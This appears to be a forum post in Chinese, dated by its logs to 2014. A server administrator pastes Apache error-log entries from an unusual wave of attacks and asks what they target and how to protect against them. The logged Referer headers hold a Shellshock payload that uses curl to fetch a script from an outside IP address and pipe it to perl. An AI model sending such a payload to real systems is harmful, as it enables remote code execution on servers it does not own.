通常,我的 apache 错误日志会受到大量典型的“phpmyadmin”(请求和大量拼写变化)、wordpress admin、joomla 和一大堆其他负载的影响。
但是昨晚我的服务器遭遇了一种新型攻击,攻击量异常大:
[Mon Oct 27 20:22:58 2014] [error] [client 46.105.118.179] File does not exist: /var/www/details.cgi, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
和
[Mon Oct 27 20:22:59 2014] [error] [client 46.105.118.179] script not found or unable to stat: /usr/lib/cgi-bin/zml.cgi, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | p$
它们都对以上两种方式进行了细微的修改。
还有人见过这种情况吗?他们在追寻什么?我是否可以采取额外的安全预防措施来应对此类攻击?